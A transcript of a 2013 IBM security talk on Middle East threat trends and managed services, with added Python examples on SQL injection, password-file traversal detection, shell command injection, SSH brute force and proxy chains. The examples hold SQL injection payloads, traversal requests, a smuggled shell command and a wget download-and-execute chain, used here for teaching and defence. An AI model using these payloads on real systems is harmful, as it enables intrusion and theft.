IBM Security Systems MENA Cyber Security - targeted attacks, expanding risks, and the changing threat landscape Tamer Aboualy, Ph.D. IBM MEA Security Services.

1 IBM Security Systems MENA Cyber Security - targeted attacks, expanding risks, and the changing threat landscape
Tamer Aboualy, Ph.D., IBM MEA Security Services CTO. April 9, 2013.
Speaker notes: Findings from the X-Force 2012 Annual Trend and Risk Report. The report covers the latest security threats that have occurred so far this year as well as trends that we track over time in our different research groups. It provides information on safe security practices for operating network infrastructures and for writing secure software, and it covers what we think are new and emerging technologies pressing into the current enterprise infrastructure that demand attention, either because of adoption rates or because of sheer overload, as we are seeing with the adoption of mobile technology. The report helps the reader better understand areas of risk and provides education for areas of focus and improvement.

2 Introduction: Dr. Tamer Aboualy
Tamer Aboualy, Ph.D., CTO, IBM Security Services Africa & Middle East
About me:
Previous IBM Canada Security Services CTO
Executive sponsor and lead for the MEA Security Operations Center (SOC)
Previous technical lead for the development and implementation of
Previous technical lead for Canada's crypto and security methods for financial payment systems
Various security patents (intrusion protection, cloud security, others)
Expert speaker at security conferences (ISACA, GOVTECH, VISA, CLOUD, IDC, Canadian Bankers Association, and many others)
Education: Bachelor of Information Systems (Ryerson University, Toronto, Canada); Master of Science in Telecommunications and Networks (Syracuse University, New York, USA); Ph.D. in Information Systems (Nova Southeastern University, Florida, USA)

3 Agenda
The Evolving Threat Landscape
IBM X-Force 2012 Threat Research Report & Middle East Threat Research
Security Intelligence Offerings Portfolio

4 Security Today: The Evolving Threat Landscape

5 IT Security has become a routine Board Room discussion
Business results at stake: Brand Image, Systems Availability, Legal Exposure, Personal Harm, Audit Risk
Breaches cited: Sony breach; HSBC breach; Epsilon breach; TJX breach (TJX Companies, Inc. press release, 8/14/2007); LulzSec breach; Zurich Insurance breach (Financial Services Authority of Britain). Sources for all breaches shown in speaker notes.

6 Motivations and sophistication are rapidly evolving
Timeline: 1995 to 2005, 1st decade of the commercial Internet; 2005 to 2015, 2nd decade of the commercial Internet.
Motive                          Adversary
National security               Nation-state actors
Espionage, political activism   Competitors, hacktivists
Monetary gain                   Organized criminals with sophisticated tools
Revenge                         Insiders, using inside information
Curiosity                       Script-kiddies or hackers

7 The new security landscape - Sophisticated attackers are a primary concern
Threat profile               Type                                             Share of incidents   Attack type
Advanced threat / mercenary  National governments, terrorist cells, crime cartels   23%            Espionage, intellectual property theft, systems disruption, financial crime
Malicious insiders           Employees, contractors, outsourcers              15%                  Intellectual property theft, unauthorized access
Hacktivist                   Social activists                                 7%                   Web defacement, information disclosure
Opportunist                  Worm and virus writers, "script kiddies"         49%                  Malware propagation, unauthorized access
Rows are ordered by potential impact. Source: Government Accountability Office, Department of Homeland Security's Role in Critical Infrastructure Protection Cybersecurity, GAO; IBM CyberSecurity Intelligence & Response Team, September 2012

8 IBM Cyber Intelligence Update
Each week the average company experiences 2.6M security attacks, which result in approximately 60 security incidents. Companies with mature cyber security programs have 90% fewer incidents and are better prepared to respond more effectively to those that do occur. Source: IBM Cybersecurity Intelligence & Response Team, Q4 2012 Scorecard (presented at Pulse 2013).

9 IBM X-Force 2012 Threat Research & Middle East Threat Research

10 The mission of X-Force is to:
X-Force is the foundation for advanced security and threat research across the IBM Security Framework. The mission of X-Force is to:
Monitor and evaluate the rapidly changing threat landscape
Research new attack techniques and develop protection for tomorrow's security challenges
Educate our customers and the general public
Speaker notes: Advanced Security and Threat Research, which includes the X-Force team, is the foundation for many of the pillars in the security product portfolio. As the team tasked with staying on top of the latest threats and vulnerabilities, the information it provides is a critical aspect of providing protection to the other parts of the framework. The rest of this deck covers the specific capabilities of this team, as well as some specific integration points between the X-Force research and the products to which it adds value.

11 IBM’s global security resources span the globe
Map of Security Research Centers and Security Operations Centers. IBM has security consultancy practices and dedicated security research capabilities across the globe.
11 Security operations centers
9 Security research centers
11 Security solution development labs
400+ Security operations analysts
500+ Field security sales / tech specialists
4, Security and Compliance professionals
20,000+ devices under contract
3,700+ MSS clients worldwide
9B+ events managed per day
1,000+ security patents*
133 monitored countries (MSS)

12 What are we seeing? Key Findings from the 2012 Trend Report
Threats and Activity:
40% increase in breach events for 2012
Sophistication is not always about technology
SQL injection, DDoS and phishing activity increased from 2011
Java: a means to infect as many systems as possible
Operational Security:
Software vulnerability disclosures up in 2012
Web application vulnerabilities surge upward; XSS vulnerabilities the highest ever seen, at 53% of web application vulnerabilities
Content Management System plug-ins provide a soft target
Saudi Arabia sent the most spam in Q3 2012, and remains the most spammed country in the world
Emerging Trends:
Social media leveraged for enhanced spear-phishing techniques and intelligence gathering
Mobile security: mobile devices should be more secure than traditional user computing devices by 2014

13 2011: “The year of the targeted attack”
2011 Sampling of Security Incidents by Attack Type, Time and Impact (bubble chart, January through December 2011). Conjecture of relative breach impact is based on publicly disclosed information regarding leaked records and financial losses. Attack types in the legend: SQL Injection, URL Tampering, Spear Phishing, 3rd Party Software, DDoS, SecurID, Trojan Software, Unknown. Industries plotted include online gaming, central and state government, national police, defense, IT security, banking, financial markets, consulting, insurance, consumer electronics, entertainment, internet and online services, marketing services, heavy industry, agriculture, apparel and telecommunications. Size of circle estimates relative impact of breach in terms of cost to business. Source: IBM X-Force Research 2011 Trend and Risk Report
Speaker notes: This chart is from the 2011 report, which we called the Year of the Targeted Attack. It highlights the activity that was covered in the press last year. The color of each circle represents the technical means used by attackers to breach these organizations; the size of the circle is a very rough estimate of the possible financial impact based on what was reported publicly. The chart is meant to represent the volume of activity that is happening out there; you can see it is quite heavy considering this is a mere sampling of what was probably actually going on. This attack activity is driving discussions at the board level and is asking executives to determine whether they are prepared for these types of events should one occur on their networks. In 2012 the attack trend continues; the most recent example was announced publicly last week by Adobe, an APT against their network. As we move forward we will discuss some of the specific attack activity and the methods used by attackers to breach systems and networks.

14 2012: The explosion of breaches continues!
2012 Sampling of Security Incidents by Attack Type, Time and Impact Conjecture of relative breach impact is based on publicly disclosed information regarding leaked records and financial losses Source: IBM X-Force Intelligence Report

15 MSS 2012 - Breakout of Security Incidents by Country

16 Web application vulnerabilities surge upward
Web application vulnerabilities surged 14%, from 2,921 vulnerabilities in 2011 to 3,551 in 2012, and represented 43% of all vulnerabilities disclosed in 2012. Cross-site scripting accounted for over half (53%) of the web application vulnerabilities disclosed in 2012. Not surprisingly, the alternating years of total vulnerability disclosures rising and falling coincide with the number of web application vulnerabilities.

17 MSS 2012 - Ranking Security Incidents

18 Tried and true techniques - Distributed Denial of Service (DDoS)
High profile DDoS attacks marked by a significant increase in traffic volume
Implementation of botnets on compromised web servers in high bandwidth data centers
Speaker notes: Denial of Service (DoS or DDoS) is another approach where attackers modified their tactics to increase sophistication. 2012 saw an enormous increase in DoS traffic volumes, with attacks using up to 60 to 70 Gbps of data, driven by compromised web servers that are online 24x7 with far more bandwidth than home PCs. In recent weeks attackers have generated as much as 300 Gbps of DDoS traffic by compromising high-bandwidth servers. Hacktivists including Anonymous and LulzSec selected DDoS as their weapon of choice, and the ready availability of exploit toolkits such as 'itsoknoproblembro' provided upgraded technology to even the rank-and-file antagonists. An interesting twist to the banking DDoS attacks was the implementation of botnets on compromised web servers residing in high-bandwidth data centers. Outdated CMS installations and plugins gave attackers shell access to many vulnerable web servers. This technique provided much higher connected uptime as well as more bandwidth than home PCs for carrying out the attacks.

19 Tried and true techniques - SQL and Command Injection attacks
Dramatic and sustained rise in SQL injection-based traffic
Alerts came from all industry sectors, with a bias toward banking and finance targets
Speaker notes: IBM MSS noted a dramatic and sustained rise in SQL injection-based traffic. Alerts came from all industry sectors, with a bias toward banking and finance targets. Anonymous and LulzSec were major players in SQL injection tactics, but most activity came from automated scanners such as LizaMoon. SQL injection uses specially formatted statements to manipulate the database underlying a web application. Fifteen days after Sony announced it had fixed its breach, LulzSec posted 150K customer account details. Injection is typically used first to understand the database schema, then to retrieve data; we have also seen a newer variant in which attackers inject a script and gain root access. When was the last time you checked your web application?
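The two-step pattern the notes describe (first learn the schema, then pull data) and the fix, as an added example that is not code from the presentation. It runs against a constructed in-memory SQLite database; the `customers` table, its rows, the `lookup_*` functions and the attacker strings are all illustration only. The schema-probe string is SQLite-specific (it reads `sqlite_master`); the same UNION technique targets `information_schema` on other engines.

```python
"""Added example: one login lookup written injectably and safely (not from the slides)."""
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample data: the kind of table an attacker would dump."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE customers (id INTEGER PRIMARY KEY, email TEXT, password_hash TEXT);
        INSERT INTO customers (email, password_hash) VALUES
            ('alice@example.com', 'h1'),
            ('bob@example.com',   'h2'),
            ('carol@example.com', 'h3');
        """
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, email: str) -> list:
    # User input is concatenated into the SQL text: the injection point.
    sql = f"SELECT email, password_hash FROM customers WHERE email = '{email}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, email: str) -> list:
    # Same query, but the value is bound as a parameter. The SQL text is fixed,
    # so the engine never parses attacker-controlled bytes as syntax.
    sql = "SELECT email, password_hash FROM customers WHERE email = ?"
    return conn.execute(sql, (email,)).fetchall()


# Constructed attacker inputs.
TAUTOLOGY = "x' OR '1'='1"        # WHERE clause becomes always-true: every row comes back
# Step one from the notes: learn the schema. In SQLite the CREATE statements live in
# sqlite_master; UNION appends them to the result set of an otherwise empty query.
SCHEMA_PROBE = "x' UNION SELECT name, sql FROM sqlite_master WHERE type='table' -- "


def demo() -> dict:
    """Run both inputs through both lookups and report what leaked."""
    conn = build_db()
    return {
        "vuln_tautology_rows": len(lookup_vulnerable(conn, TAUTOLOGY)),
        "vuln_schema_leak": lookup_vulnerable(conn, SCHEMA_PROBE),
        "safe_tautology_rows": len(lookup_safe(conn, TAUTOLOGY)),
        "safe_schema_rows": len(lookup_safe(conn, SCHEMA_PROBE)),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The tautology dumps all three accounts from the vulnerable lookup, and the probe returns the `CREATE TABLE` text including the `password_hash` column name, which is exactly what the next injected query would target. The parameterised lookup returns no rows for either input because the whole string is compared as a literal e-mail address.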

20 IBM Security MSS – Top Volume Signatures for 2011 and 1H 2012 (based on MSS global volumes)
SQL Slammer: the most durable Internet malware, but levels are decreasing significantly
A Microsoft Windows Sysinternals command-line remote administration tool, similar to a lightweight Telnet
HTTP Unix Password: attempts to access the password files (/etc/passwd and /etc/shadow) on UNIX systems through HTTP
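What the "HTTP Unix Password" signature has to cope with, as an added example (not IBM's signature logic): attackers reach `/etc/passwd` through directory traversal and hide the request behind URL encoding, sometimes double encoding, so a detector must decode to a fixed point before matching. The access-log lines are constructed for the example; the log format is Apache/nginx combined format.

```python
"""Added example: spot /etc/passwd and /etc/shadow requests in web access logs after
normalising URL encoding. Sample log lines are constructed, not real traffic."""
import re
from urllib.parse import unquote

# Constructed combined-format access log excerpt.
SAMPLE_ACCESS_LOG = """\
203.0.113.9 - - [03/Mar/2013:10:00:01 +0000] "GET /cgi-bin/view.cgi?file=../../../../etc/passwd HTTP/1.1" 200 512
192.0.2.1 - - [03/Mar/2013:10:00:02 +0000] "GET /index.html HTTP/1.1" 200 2048
198.51.100.3 - - [03/Mar/2013:10:00:03 +0000] "GET /images/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 404 0
198.51.100.3 - - [03/Mar/2013:10:00:04 +0000] "GET /download?f=%252e%252e%252f%252e%252e%252fetc%252fshadow HTTP/1.1" 403 0
192.0.2.1 - - [03/Mar/2013:10:00:05 +0000] "GET /etcetera/passwdless HTTP/1.1" 200 10
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
SENSITIVE = re.compile(r"/etc/(passwd|shadow)\b")
TRAVERSAL = re.compile(r"(^|/)\.\.(/|$)")


def normalize(path: str, max_rounds: int = 3) -> str:
    """Percent-decode until the string stops changing (bounded), then tidy separators.
    Single-pass decoders miss %252e%252e, which decodes to %2e%2e and only then to '..'."""
    prev, cur = None, path
    for _ in range(max_rounds):
        if cur == prev:
            break
        prev, cur = cur, unquote(cur)
    cur = cur.replace("\\", "/")          # IIS-style backslash traversal
    while "//" in cur:
        cur = cur.replace("//", "/")
    return cur


def classify(request_target: str) -> dict:
    """Decode a request target and say whether it reaches for a password file."""
    p = normalize(request_target)
    return {
        "path": p,
        "sensitive_file": bool(SENSITIVE.search(p)),
        "traversal": bool(TRAVERSAL.search(p)),
    }


def scan(log_text: str) -> list:
    """Return one record per log line that targets /etc/passwd or /etc/shadow."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        verdict = classify(m["target"])
        if verdict["sensitive_file"]:
            hits.append({"ip": m["ip"], "status": int(m["status"]), **verdict})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_ACCESS_LOG):
        print(hit["ip"], hit["status"], hit["path"])
```

Note that the 200 response on the first line is the one worth paging someone about; the 403 and 404 show the probe was blocked but still identify the scanning source. Matching on the decoded path also keeps `/etcetera/passwdless` from being a false positive, which a naive substring search for `etc` and `passwd` would flag.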

21 Shell Command Injection attacks
Speaker notes: This year we have seen an uptick in a different kind of web application attack activity called shell command injection. Instead of injecting database commands through the web application, attackers inject command-line commands that run on the operating system hosting the web application. The chart shows a significant increase in this activity at the end of the year, so we are starting to see automated shell command injection attacks that work largely the same way as the SQL injection activity did. This vulnerability has probably received less focus over the last few years, but as a consequence of the increased activity we think organizations should start paying more attention to it. The attack executes system shell commands; it typically involves the server downloading a remote script, storing it in a temp directory and then executing it. The script is designed to maintain remote control, gather intelligence and establish command and control back to the attacker's computer, and it is also used as a launch pad to infiltrate other servers. Mitigation: proper configuration, sanitization of ALL inputs, and eliminating or restricting the server software's access to shell commands such as wget, passwd, dir and ls.
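The vulnerable pattern next to its hardened form, as an added example that is not code from the presentation. The directory-listing helper, its allowlist and the attacker string are assumptions made for illustration; it assumes a POSIX host where `ls` and `/bin/sh` exist. The hardened version applies the two mitigations from the notes: reject input that is not on an allowlist, and stop the web process from reaching a shell at all.

```python
"""Added example: a command-injectable helper and its hardened form (not from the slides)."""
import re
import shlex
import subprocess

# Allowlist for a path argument: letters, digits, '_', '.', '/', '-'. Anything else
# (';', '|', '&', '$', backticks, whitespace) is rejected rather than "cleaned".
SAFE_PATH = re.compile(r"^[A-Za-z0-9_./-]+$")


def list_dir_vulnerable(path: str) -> str:
    # shell=True hands the whole string to /bin/sh, so metacharacters in `path`
    # start new commands: the pattern behind the wget-to-/tmp attacks described above.
    result = subprocess.run(f"ls -ld {path}", shell=True, capture_output=True, text=True)
    return result.stdout


def list_dir_hardened(path: str) -> str:
    # 1. Validate against the allowlist and refuse traversal.
    if not SAFE_PATH.match(path) or ".." in path:
        raise ValueError(f"rejected path: {path!r}")
    # 2. No shell: the argv list goes straight to execve, so even a ';' that slipped
    #    through step 1 would just be a character in a filename, never a command separator.
    result = subprocess.run(["ls", "-ld", path], capture_output=True, text=True, check=True)
    return result.stdout


def quoted_command(path: str) -> str:
    # Defence in depth for the cases where a shell is unavoidable: shlex.quote
    # turns the argument into one literal word. Still pair it with the allowlist.
    return f"ls -ld {shlex.quote(path)}"


INJECTED = "/tmp; echo INJECTED"   # constructed attacker input


def demo() -> dict:
    """Show the injected command running in the vulnerable path and being refused in the hardened one."""
    out = {"vulnerable": list_dir_vulnerable(INJECTED)}
    try:
        list_dir_hardened(INJECTED)
        out["hardened"] = "ran"
    except ValueError as exc:
        out["hardened"] = str(exc)
    out["quoted"] = quoted_command(INJECTED)
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

In the vulnerable helper the `echo INJECTED` executes and its output appears in the captured stdout; swap `echo` for `wget http://... -O /tmp/x && sh /tmp/x` and you have the download-and-execute chain from the notes. The argv form cannot be driven that way regardless of input, which is why it, rather than quoting, is the primary fix.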

22 SSH brute force activity - Seems to have reached a plateau
Speaker notes: We also saw a spike in volume at the end of the year in SSH brute forcing. This is one of the most common types of attack we see on the Internet: people scan for computers running SSH and try to brute-force user names and passwords on those computers. We are not sure if this huge spike is an anomaly or whether it will continue to be a problem in 2012, but it is certainly alarming, and if you have SSH running on a computer it is important to have good passwords, because if you don't, those passwords will quickly be compromised automatically. Brute force attacks attempt to access a system by trying a large number of password possibilities. A successful attack can allow the attacker to view, copy, delete, import or execute code and files. Many organizations still use weak or default SSH user IDs and passwords. Organizations should use strong passwords or stronger authentication methods.
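Detection logic for the activity described above, as an added example (not from the presentation): count failed SSH logins per source inside a sliding window, flag sources that cross a threshold, and raise a higher-severity alert when a flagged source then succeeds, which is the signal that a weak password was actually found. The `auth.log` lines are constructed for the example and the threshold and window are assumptions.

```python
"""Added example: SSH brute-force detection over syslog-style sshd lines (constructed data)."""
import re
from collections import defaultdict
from datetime import datetime

# Constructed auth.log excerpt, not real traffic.
SAMPLE_AUTH_LOG = """\
Mar  3 10:00:01 host sshd[100]: Failed password for invalid user admin from 203.0.113.5 port 4001 ssh2
Mar  3 10:00:02 host sshd[101]: Failed password for invalid user oracle from 203.0.113.5 port 4002 ssh2
Mar  3 10:00:03 host sshd[102]: Failed password for root from 203.0.113.5 port 4003 ssh2
Mar  3 10:00:04 host sshd[103]: Failed password for root from 203.0.113.5 port 4004 ssh2
Mar  3 10:00:05 host sshd[104]: Failed password for root from 203.0.113.5 port 4005 ssh2
Mar  3 10:00:09 host sshd[105]: Accepted password for root from 203.0.113.5 port 4006 ssh2
Mar  3 10:02:00 host sshd[106]: Failed password for alice from 198.51.100.7 port 5001 ssh2
Mar  3 10:02:30 host sshd[107]: Accepted publickey for alice from 198.51.100.7 port 5002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+"
)


def parse(line: str, year: int = 2013):
    """Return (timestamp, result, method, user, ip) or None for lines we do not care about.
    Syslog omits the year, so it is supplied (assumed 2013 for the sample)."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["method"], m["user"], m["ip"]


def detect(log_text: str, threshold: int = 5, window_seconds: int = 60) -> dict:
    """Flag sources with >= threshold failures inside the window, and any login
    (password or key) from a flagged source afterwards."""
    failures = defaultdict(list)   # ip -> timestamps of recent failures
    brute = {}                     # ip -> time the threshold was first crossed
    logins_after_burst = []        # (ip, user, method)
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        ts, result, method, user, ip = rec
        if result == "Failed":
            window = failures[ip]
            window.append(ts)
            while (ts - window[0]).total_seconds() > window_seconds:   # expire old entries
                window.pop(0)
            if len(window) >= threshold and ip not in brute:
                brute[ip] = ts
        elif result == "Accepted" and ip in brute:
            logins_after_burst.append((ip, user, method))
    return {"brute_force_sources": sorted(brute), "logins_after_burst": logins_after_burst}


if __name__ == "__main__":
    print(detect(SAMPLE_AUTH_LOG))
```

The second source fails once and then authenticates with a key, so it is left alone; the first crosses the threshold in four seconds and its subsequent `Accepted password for root` is the line that should open an incident. The `invalid user` variant is matched on purpose, since brute forcers enumerate usernames before passwords.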

23 Anonymous proxies on the rise
Approximately 4 times more anonymous proxies than seen 3 years ago
Some used to hide attacks, others to evade censorship
Signature detects situations where clients are attempting to access websites through a chain of HTTP proxies
Could represent legitimate (paranoid) web surfing, or attackers obfuscating the source address of attacks launched against web servers
Speaker notes: Another area where we have seen a lot of activity is anonymous proxies. In the first half of 2011 there were about four times as many anonymous proxies registered as three years ago. Although this activity tapered off a little in the second half of the year, the overall trend is up over 2010 numbers. Anonymous proxies are a critical type of website to track because of the ease with which proxies allow people to hide potentially malicious intent.
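A simplified version of what such a signature looks at, as an added example that is not IBM's signature: given one HTTP request as your server received it, check whether the client is asking you to act as a proxy (an absolute-URI request line or a CONNECT), and how many upstream proxies the `Via` and `X-Forwarded-For` headers admit to. The sample requests are constructed. Caveat a practitioner would want: anonymizing proxies built to hide the client strip these headers, so an empty result proves nothing; a populated chain is the positive signal.

```python
"""Added example: proxy-chain indicators in a single HTTP request (constructed samples)."""
import re

REQUEST_LINE_RE = re.compile(r"^(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d$")

# Constructed requests (LF line endings for readability).
DIRECT = "GET /index.html HTTP/1.1\nHost: www.example.com\n"
SINGLE_PROXY = "GET /index.html HTTP/1.1\nHost: www.example.com\nVia: 1.1 corp-gw.example\n"
CHAINED = (
    "GET http://www.example.com/admin HTTP/1.1\n"        # absolute URI: client treats us as a proxy
    "Host: www.example.com\n"
    "Via: 1.1 proxy-a.example, 1.1 proxy-b.example\n"    # two proxies already traversed
    "X-Forwarded-For: 10.0.0.7, 192.0.2.44\n"
)


def _split_list(value: str) -> list:
    """Split a comma-separated header value, dropping empties."""
    return [item.strip() for item in value.split(",") if item.strip()]


def analyze_request(raw: str) -> dict:
    """Parse the request line and headers and report proxy-chain indicators."""
    head, *rest = raw.strip().splitlines()
    m = REQUEST_LINE_RE.match(head)
    if not m:
        raise ValueError("not an HTTP request line")
    headers = {}
    for line in rest:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()   # header names are case-insensitive

    target = m["target"]
    # A request that names a full URL, or a CONNECT, is asking *this* server to proxy it.
    proxy_request = target.startswith(("http://", "https://")) or m["method"] == "CONNECT"
    via_hops = _split_list(headers.get("via", ""))
    xff_hops = _split_list(headers.get("x-forwarded-for", ""))
    upstream = max(len(via_hops), len(xff_hops))   # proxies the request admits to having crossed
    return {
        "proxy_request": proxy_request,
        "via_hops": via_hops,
        "xff_hops": xff_hops,
        "upstream_proxies": upstream,
        # Two or more proxies in the path (counting us if we are being asked to be one).
        "chained": upstream + (1 if proxy_request else 0) >= 2,
    }


if __name__ == "__main__":
    for name, req in [("direct", DIRECT), ("single", SINGLE_PROXY), ("chained", CHAINED)]:
        print(name, analyze_request(req))
```

A single corporate gateway in `Via` is ordinary and should not alert; the chained request is the case the slide describes and the first `X-Forwarded-For` entry is the best available, though forgeable, hint at the real origin.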

24 January 2013 SPAM Report: Saudi Arabia and Qatar the most spammed countries. Source: Symantec Intelligence Report

25-26 Monthly spam charts for January, February, May, June, July and August 2012 (figures). Source: Symantec Intelligence Report

27 2012 Summary of SPAM for GCC Receiving Countries
Monthly spam charts for September, October, November and December 2012 (figures).
Saudi Arabia: number 1 spam-receiving country in every month except one, when it was number 2
Qatar: in the ranking for 6 months
Oman: 3 months
Kuwait: 2 months
Source: Symantec Intelligence Report

28 Saudi Arabia Top SPAM Producing Country in Q3 2012
Speaker notes: The Trend Micro report placed Saudi Arabia as the top spam-producing country in Q3 2012 (see the Trend Micro graphic). However, others (IBM, Symantec and others) reported that Saudi Arabia was the top spam-producing country only for a few weeks or a month. According to SpamRankings.net, the Festi botnet used SaudiNet for its spamming activities, making Saudi Arabia, a newcomer, the top spam-sending country in Q3 2012. Spammers were probably taking advantage of the fact that Saudi Arabia-hosted IP addresses would not raise red flags. Source: Trend Micro Intelligence Report

29 X-Force MSS 2012 – SPAM Volumes vs SPAM Sent From Saudi Arabia, India, Peru, and Spain
Saudi Arabia overtook India as top SPAM producing country for a short period.

30 Security Landscape in the Kingdom
KSA has double the global average of infected computers. Source: Microsoft Regional Security Intelligence Report

31 Categories of Unwanted Software (malware) in Saudi Arabia
Source: Microsoft Regional Security Intelligence Report

32 Comparing the Middle East and Gulf Countries
Chart comparing Palestine, Iraq, Egypt, UAE, Saudi Arabia, Kuwait, Qatar and Oman against the global average (figure).

33 Protecting Our Clients
Managed Security Solutions
Consulting
Security solutions

34 IBM Managed Security Services Are Provided Locally in Saudi Arabia
Experience & Expertise: MSS business founded 1995; employee tenure average 4.5 years; embedded X-Force intelligence
Market Leadership: Forrester Wave; Gartner Magic Quadrant; Frost & Sullivan
BCP/DRP & Compliance: Riyadh, KSA; fully redundant services; BC/DRP test performed annually; SSAE-16, PCI, FFIEC, ITCS-104
MSS Global Facts and Figures:
11 Security Operations Centers
3,700+ MSS clients worldwide
20,000+ security devices
15B+ security events daily
Recording over 30k incidents daily
Monitoring in 133 countries
Using a grid of 725+ systems
Maintaining 99.9+% availability
6,000 researchers, developers and subject matter experts working security initiatives worldwide

35 Clients can be confident knowing that IBM Security Services are backed by IBM's strong market leadership and analyst recognition
IBM Managed Security Services; IBM Security Consulting Services
"IBM has the largest client base of the participants... Clients praised the flexibility, knowledge, and responsiveness ...while also noting the company's excellent documentation. Organizations looking for a high-quality vendor that can do it all and manage it afterwards should consider IBM." Source: Forrester Research Inc., "Forrester Wave: Information Security Consulting Services, Q1 2013" and "Forrester Wave: Managed Security Services Providers, Q1 2012". Full report can be accessed at

36 IBM has a broad base of consulting services to provide end to end solutions.
Security Consulting & Professional Services: 6000+ security consultants and architects; assess security risk and compliance, evolve the security program
Managed Services: globally available managed security services platform; manage security operations, detect and respond to emerging risk

37 Detailed Portfolio View
Security Strategy, Risk and Compliance: Security Risk Assessment; Security HealthCheck; Information Security Assessment; Policy Development; Cloud Security Consulting; PCI, SCADA, Compliance
Cybersecurity Assessment and Response: Emergency Response Services; Penetration Testing; Application Security Assessment; Application Source Code Assessment; Security Operations Optimization; SIEM Design
Identity & Access Management (strategy and assessment; design and deployment): Identity Assessment and Strategy; User Provisioning and Access Mgmt; Total Authentication Solution; Managed / Cloud Identity
Infrastructure and Endpoint: Deployment and migration; Staff augmentation
Data and Application Security: Data Security Strategy and Assessment; Encryption; Endpoint and Network Data Loss Prevention
Managed Security: Managed SIEM; Intrusion Detection and Prevention; Firewall; Unified Threat Mgmt; Managed Protection; X-Force Threat Analysis
Hosted and Web: Hosted Vulnerability Mgmt; Hosted Security Event and Log Mgmt; Hosted Application Sec Mgmt

38 Security Requirements
The Managed Security Solutions portfolio can address a wide variety of challenges and business requirements. Multiple device types and vendors are supported.
Managed Security Services:
Managed firewall services
Managed IPS (Intrusion Prevention System) and IDS (Intrusion Detection System) services
Managed UTM (Unified Threat Management) services
Managed Security Information and Event Management
Cloud security services:
Hosted vulnerability management services
Hosted security event and log management services
Hosted IBM X-Force threat analysis services

39 Managed Network Security Services: Firewall, IDPS, UTM
Solution Overview: IBM's Managed Security Services for Firewall, IPS and UTM are designed to reduce the operational overhead associated with the day-to-day management of core security technologies that provide the foundational elements of an organization's overall security posture. These offerings combine management, monitoring and maintenance across a variety of leading technologies and service levels.
Key Features:
Support for market leading technologies: Check Point, Cisco, IBM, Juniper, McAfee, TippingPoint, Sourcefire, Palo Alto, etc.
Support for comprehensive product features: most major product features are supported, including virtualization, multiple policies, traffic shaping, content security and custom signatures.
Industry leading service level agreements: SLAs that set the benchmark for the industry, covering incident response, change management, system monitoring, portal availability, content updates, etc.
Two offering packages to ensure flexibility: designed to meet the needs of less demanding through to the most mission-critical environments.
Integrated service views via the IBM Virtual SOC: IBM's proprietary web-based interface provides real-time, on-demand access to the latest service information, including alerts, advisories, system configuration, and comprehensive workflow and reporting capability.
Customer Pain Points:
Multiple technologies create a challenge for skills management
Proper security administration requires round-the-clock support
Compliance mandates competency beyond that of many organizations
Security teams are needed for more strategic activities, but security technologies remain complex and cumbersome to implement
Speaker notes: The largest segment of MSS revenue comes from these services. Solutions cover new device roll-out (green field) or take-over of existing devices from the customer; take-overs require a bit more planning. We provide policy management, device health and availability monitoring, and security event monitoring. Benefits: faster time to deploy and reduced operational overhead within multi-vendor environments, with 24x7 support for round-the-clock monitoring, response and management.

40 Cloud Security Services: Security Event and Log Management
Solution Overview: The Security Event and Log Management Service (SELM) enables compilation of the event and log files from network applications, operating systems and security technologies into one seamless platform. The SELM offering allows for automated analysis of IPS data as well as robust query and research capabilities against a variety of disparate log types.
Key Features:
Two tiers of service: SELM is available in Standard and Select service levels, allowing varying degrees of analysis and analytics to be applied to varying data types.
Integrated workflow and analysis capabilities: security issues can be investigated, escalated and recorded using IBM's web-based tools.
Seamless blending of MSS and non-MSS data: data from managed and unmanaged devices is stored in the same systems and interacted with as though it were one common data set.
Custom log parser and correlation engine: easily use regular expressions to add support for custom log sources and correlation rules. Unique IBM functionality.
Forensically sound storage and archival: SELM employs best-practice processes for data in motion and at rest as suggested by IBM's own Emergency Response Services team.
Customer Pain Points:
Information and event management solutions can be overly complex
SIM implementation can take months and hundreds of thousands of dollars
Many solutions struggle to scale when real-time analysis is required
Reporting requirements are often not met by off-the-shelf solutions
Benefits: improved time to value by leveraging an on-demand cloud-based platform versus cumbersome CPE deployment options; quickly analyze data from multiple geographies and technologies via a single web-accessible interface; cloud-based deployment allows seamless off-site storage of critical log data; optional outsourcing of event monitoring to IBM experts on a shift-by-shift basis.
Speaker notes: The Hosted Security Event and Log Management solution is designed to provide a cloud-based offering for log and event collection and management. The general idea is to collect data from operating systems, applications, network infrastructure and security devices, and bring that information into the cloud in a secure and streamlined fashion. That data can then be properly archived and stored for the long term so that it can be queried and analyzed for potential security issues, and run through a variety of intelligent rules to identify potential problems or events of interest that a customer might wish to explore more deeply. This service can be used standalone by customers looking to simplify security information and event management by leveraging our low-cost cloud-based solution, or in conjunction with the rest of our managed services for customers who want to complete the picture by bringing together data from devices they manage themselves with devices that IBM manages for them under other Managed Security Services offerings. Think of a customer who has some intrusion prevention devices under IBM management and some they manage on their own: by leveraging the Security Event and Log Management solution they can bring all of that data into one place to complete security incident investigations more quickly, understand the impact of a potential attack more effectively, and get better visualization of what might be occurring across the overall security deployment.

41 Cloud Security Services– Hosted Vulnerability Management overview
